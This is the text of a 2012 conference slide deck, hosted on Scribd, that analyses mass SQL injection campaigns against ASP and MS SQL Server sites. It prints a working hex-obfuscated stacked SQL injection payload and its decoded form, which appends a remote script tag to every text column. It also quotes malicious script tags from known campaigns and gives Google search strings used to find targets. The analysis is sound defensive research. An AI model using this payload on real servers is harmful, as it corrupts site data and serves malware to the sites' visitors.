Scribd
Upload
114 views

Analysis of Mass SQLi Attacks

The document discusses mass SQL injection attacks and analyzes the modus operandi of attackers. It describes how attackers use automated tools to find vulnerable websites through Google searches and then inject obfuscated SQL payloads to update text columns and insert malicious scripts on a large scale. Examples are provided of payloads and attacks on different platforms. Various malware families and attack tools used in these types of SQL injection campaigns are also examined.

Uploaded by

Miroslav Stampar
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
114 views

Analysis of Mass SQLi Attacks

The document discusses mass SQL injection attacks and analyzes the modus operandi of attackers. It describes how attackers use automated tools to find vulnerable websites through Google searches and then inject obfuscated SQL payloads to update text columns and insert malicious scripts on a large scale. Examples are provided of payloads and attacks on different platforms. Various malware families and attack tools used in these types of SQL injection campaigns are also examined.

Uploaded by

Miroslav Stampar
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 40

Analysis of mass SQL injection attacks

Miroslav tampar
([email protected])

FUD (Fear, Uncertainty, Doubt)


A new virus is making the rounds and is wreaking havoc on the Internet Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data Targets that bottleneck in the technology, making it platform-independent Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else ...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs
FSec FOI 2012, Varadin (Croatia) September 21st, 2012 2

Google is (not) your friend (1)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

Google is (not) your friend (2)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

Google is (not) your friend (3)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

What's it all about?


Platform dependent (IIS/ASP(.NET)) DBMS dependent (Microsoft SQL Server) Highly automated (tool-based) approach Popular SQL enumeration tools with or without Google search capability don't count (e.g. sqlmap, Havij, Pangolin) Infection(s) counting in thousands of domains (not millions as previously believed) Dummy as it can be (usually one request per target) In short: malware distribution
FSec FOI 2012, Varadin (Croatia) September 21st, 2012 6

Modus operandi
Get hands on couple of 1-day exploits Blindly inject SQL payload carrying malicious content (<script>, <iframe>, etc.) into content tables of as much as possible vulnerable web servers Leverage exploit(s) and/or user's lack of technical knowledge to install malware (spyware, trojans, etc.) to visitor's computer Profit(???) - (DEFCON 18 Garry Pejski: My Life As A Spyware Developer)
FSec FOI 2012, Varadin (Croatia) September 21st, 2012 7

Sample leveraged exploits


CVE-2012-4681 CVE-2012-1889 CVE-2012-1723 CVE-2012-0507 CVE-2011-3544 CVE-2011-2110 CVE-2011-0611 CVE-2010-3552 CVE-2010-0188 etc. Oracle Java 7 Update 6 Microsoft XML Core Services Java Runtime Environment Java Runtime Environment Java Runtime Environment Adobe Flash Player Adobe Flash Player New Java Plug-in Adobe Reader

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

Notable members (1)


Lilupophilupop (sl.php)
"></title><script src="http://lilupophilupop.com/sl.php"></script><!--

Nikjju (r.php)
<script src=http://nikjju.com/r.php></script>

Robint (u.js)
<script src=http://ww.robint.us/u.js></script>

LizaMoon (ur.php)
</title><script src=http://lizamoon.com/ur.php></script>

Jjghui (urchin.js)
</title><script src=http://jjghui.com/urchin.js></script>

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

Notable members (2)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

10

Notable members (3)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

11

Generic payload (obfuscated)


GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C40 4320564152434841522832353529204445434C415245205461626C655F43 7572736F7220435552534F5220464F522053454C45435420612E6E616D65 2C622E6E616D652046524F4D207379736F626A6563747320612C73797363 6F6C756D6E73206220574845524520612E69643D622E696420414E442061 2E78747970653D27752720414E442028622E78747970653D3939204F5220 ............................................................ 5845432827555044415445205B272B40542B275D20534554205B272B4043 2B275D3D525452494D28434F4E5645525428564152434841522834303030 292C5B272B40432B275D29292B27273C736372697074207372633D687474 703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F73637269 70743E27272729204645544348204E4558542046524F4D205461626C655F 437572736F7220494E544F2040542C404320454E4420434C4F5345205461 626C655F437572736F72204445414C4C4F43415445205461626C655F4375 72736F7220 AS VARCHAR(4000));EXEC(@S);--

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

12

Generic payload (decoded)


DECLARE @t VARCHAR(255), @c VARCHAR(255) DECLARE table_cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) /* NTEXT, TEXT, NVARCHAR, VARCHAR */ OPEN table_cursor FETCH NEXT FROM WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR, ['+@c+']))+''<script src=http://www.attacker.com/malicious.js></script>''') FETCH NEXT FROM END CLOSE table_cursor DEALLOCATE table_cursor
FSec FOI 2012, Varadin (Croatia) September 21st, 2012 13

table_cursor INTO @t,@c

table_cursor INTO @t,@c

Analysis (1)
Piggy backing (stacked) SQL injection Obfuscated SQL code (hex encoded) Decoded code dynamically executed with TSQL EXEC command Usage of cursor for update Iterating over all tables / all text-like columns Appending malicious content (e.g. <script src=...) to all matched column entries using UPDATE statement

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

14

Analysis (2)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

15

Analysis (3)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

16

Example (1) - FAIL

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

17

Example (2) - FAIL

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

18

Example (3) - FAIL

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

19

Example (4) CLUSTER FAIL

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

20

Example (5) - SUCCESS

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

21

Example (6) - SUCCESS

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

22

Asprox (1)
Spam botnet used for phishing scams (>10K bots) Developed over years Interesting update msscntr32.exe (SQL attack tool) Google search for targets (e.g. inurl:".asp") Launch SQL injection attacks against resulting pages

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

23

Asprox (2)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

24

CLI (1)
Standalone executable Rare beast (Chinese underground forums?) Google search for targets (e.g.: inurl:".asp" inurl:"a=") Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></s cript>) Wild guess is that attackers are being paid for using the tool (backcall to *.cn/pay.asp? SN=...)
FSec FOI 2012, Varadin (Croatia) September 21st, 2012 25

CLI (2)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

26

Sample tool (1)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

27

Sample tool (2)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

28

Sample tool (3)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

29

Sample tool (4)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

30

Sample tool (5)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

31

Sample run (1)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

32

Sample run (2)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

33

Sample run (3)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

34

Sample run (5)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

35

Sample run (6)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

36

Sample run (7)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

37

Sample run (8)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

38

Sample run (9)

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

39

Questions?

FSec FOI 2012, Varadin (Croatia)

September 21st, 2012

40

You might also like